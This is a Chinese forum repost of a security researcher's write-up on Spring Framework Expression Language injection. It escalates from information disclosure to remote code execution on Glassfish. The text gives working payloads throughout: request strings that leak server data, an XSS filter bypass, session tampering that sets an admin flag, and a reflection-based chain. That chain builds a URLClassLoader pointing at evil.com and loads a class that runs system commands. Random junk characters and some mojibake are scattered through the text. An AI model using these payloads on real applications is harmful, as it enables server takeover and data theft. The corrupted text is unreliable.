Remote Code with+ O& J5 q: v. ^* E
Expression Language Injection( h0 a7 I3 k) j( M$ W$ y
Spring Framework脆弱性—DanAmodio
5 ~. | k& ~ T5 O& M全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
3 u$ i2 |# M L* S& @$ l# _; P可能会存在风险。6 N, J* V# L; Y) q: T
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
$ V1 b5 z5 a' g6 d! T: ~Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可( U' L* J- P G% a
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
) O9 U3 E; @) [) x( F7 f以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前
: E6 a& P+ @" _8 w. Z% B版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。/ B& y; L& b4 H. o: X1 `2 w
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
" I; T2 K1 ^3 ]' S我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版% Q9 b2 V7 O' y- c) A3 r/ T
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。3 a" Z, x8 }* E# K; g
这些版本不支持禁用double EL resolution.
/ H# K! _( O/ k4 ^$ h1 z! y这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含+ @( l% ?# B% U* b
EL2.2容器上可能进行远程代码执行。& Y9 @! ^0 H6 q: u$ r$ L
这是一个原始信息泄露的攻击例子:
% S z) c# l% T( O; {) @' R& S请求:, L8 H& w, j- }6 ?0 e2 E
ttp://vulnerable.com/foo?message=${applicationScope}
( e/ q! L5 S" A! R [6 n到达以下内容页面: ~( I% P' g) A% Z3 A+ ~
结果将输出一些包含内部服务器信息calsspath 和本地工作目录 K' P8 B- w& D
你也可以做一些其他事情,如这样:7 u7 O& D1 s/ {* q* r
${9999+1}: `! c- @1 O2 a9 |& x9 w! S/ Z. Q
还可以访问session 对象和beans
2 }* b; {- N; f- [% y# \${employee.lastName}
: B6 d1 T7 y9 \/ u% B在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是8 j- ^4 u5 X) j* f4 b( _9 B1 U
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
* p% [7 y5 O: s$ T6 V' E西,比如XSS.
) V( c; Q2 I: W0 ]0 z哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签1 g5 |6 f2 `4 T Z4 k0 |
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
u+ C, O' c+ T" G" L呢?”
: Y b3 _5 b( Q/ J- u. f8 \因此,我尝试巳缦拢�
' i/ Z, w0 [* x- }$ l1 Y zhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP m4 ?: C) V, k5 Y) w
P
1 k5 G7 M5 B3 Z% }+ L我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返8 x. }/ [/ U" y5 s, Q. M( }: t
回的文本被插入进了spring:message 标签。
) o2 \2 E8 l f( ]5 z" Z5 G7 x这里是一个最终绕过过滤的实例:$ T/ u+ G0 N; @- s
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ& I t! P/ L$ J. C) b8 I/ o r( E
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
; B6 `1 h7 ?, u/ z. E$ E0 A什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?
' Z& N: z& n$ K- ]3 \3 w# l经过一番研究,我学习到EL2.2 增加了方法调用。/ g7 S& f* P# @; h9 b+ ]
我写了一个快速测试应用程序代码并且检测一些功能2 d" \8 l2 R6 u9 J8 f# n+ Q W* y" l7 b
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
# K5 u! ~4 b) E1 {" P${pageContext.request.getSession().setAttribute(“admin”,true)}
( N4 _; I/ m4 h" B0 v; H好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
+ b' X c" @* k6 E1 h9 ?指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
! R2 n% K- O; U+ j9 B${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
/ h3 A4 N1 C8 l- G, X“, 1234)}
# O5 I# K2 d% ^- I) C1 S" `7 {5 E${“”.getClass().forName(“java.lang.Runtime”)}4 Z8 l! L! Z- l3 _/ P# J' b, N
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
% J" z' ~3 M) x% e. t2 u可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
2 |: K( R1 ^5 D L) ^9 |4 _# B, R数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有" v" \ o: r+ J' a- f* h x
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
0 h9 K+ U( `3 H. e2 ?) t( r方法签名invoke(Object obj, Object„ args)* H: s2 T! b: |' [ p: G T. w
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
9 m9 F3 I- P( Z0 [, j. U题,以让它可以工作起来。
8 a; W( A K# w) ~7 b3 R漏洞利用:
0 U2 W0 S @# x# ~( J! J我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我8 d: d- F7 J. ?$ f5 D1 I
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
4 Y0 q; d" k5 Z- I这里有一些我试过的失败的用例,为了试图让它工作的用例:1 s$ r8 l' C# Z Z
写文件到文件系统9 C4 c. ?) r, q' G
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.' M: i. U. I# O
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
6 b! {5 x" J' g! u0 Z( \${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}" q' w6 p) g0 m5 e; M
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:3 ]9 I7 j' [) q
org.springframework.expression.spel.standard.SpelExpressionParser not found
$ d0 m& O9 ]% }. C1 l7 Qby
9 {6 r- U: p5 @ norg.glassfish.web.javax.servlet.jsp [194].' r D- B" i; z
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
& r0 e: J( d7 n2 r' r9 s7 y* D$ T( n 利用反射来创建一个新的Runtime(and watch the world burn)
6 j( U. O* C, S+ A${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
- P$ m& E2 j; t: K(“java.lang.Runtime”)).getDeclaredConstructors()[0])}/ P1 B: J) J4 E! r. `" X" M8 u
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
p, w# @ M# y7 _4 | 使用java.lang.ProcessBuilder# \- o/ c8 I9 X3 k6 b8 h& M1 ]
用表达式语言来评估表达式语言; p( h c6 j. D4 w
Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
! k' l: N( Y! I* Z6 p) ]) ^${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request5 M/ x5 q& G+ \9 F `: J% P H
“,”".getClass(),null)}
5 ~2 z! h1 e- v, A 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
$ Q0 W) m a6 a' n& e4 o% ~我在使用一个空数组通过Method.invoke()时失败了很多次
$ ]# V" E0 `! S$ |2 b8 P; j" B“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
. N' O( T8 v1 y9 i6 L7 x.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A1 `2 W! x6 w: p; c
rrayList”).newInstance().toArray())
" _- p. e+ c) njava.lang.IllegalArgumentException: wrong number of arguments5 j; I6 J5 [1 S- S+ C1 n
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
" j1 W8 X* U8 U以创建一个恶意class文件并且指向类装载器.* ?6 C d; H- V3 u# P
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
: i' Q# Z" i& S! x, \0 hpublic class Malicious {
) K' h- T6 z O6 l+ f6 upublic Malicious() {
& I" d5 g; n* ^( Y# d0 utry {
) R" g5 k9 t: Sjava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
* J2 \+ v: |; ~java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
6 C9 V* l+ a# f! T} catch (Exception e) {
( N3 w+ n: ?* j4 a}
3 ?; E- h# _$ c2 q}$ W6 G% b8 ^' I; O" i1 N Q r
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回* Y% \* V+ @' x. z
话中,因此它可以被使用.% o" L+ r' `5 i) K/ A" E+ V
${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
6 Y4 ?8 o9 A0 p' H! q(“java.util.ArrayList”).newInstance())}
5 f( C+ Q+ T, c8 h) T3 { S' mURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
! u) ~& C; f7 @: s3 K# R: z一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和6 J4 c2 {6 v) s7 J
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个
, ?. S6 \! O6 _# u. @8 `我们可以调用的create(string)方法,然后转换对一个URL对象。1 j5 q; X- R# U# O: x
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
K, s! w/ J; G% |ere/malicious/classfile/is/located/”).toURL())}
1 }9 s- I# E8 ~- ^: b- q然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
7 h; z; z7 Q; V H& s2 _6 Z恶意类文件被装载并创建,触发远程代码.
0 h+ o, A% X" X$ F3 Q( A1 G${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
$ ^. Q' J5 \1 z& H& Zxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass()., i3 L1 l9 J/ D- N/ k8 z# n' z
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance5 @6 a4 Q' t$ z1 H* D; S
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对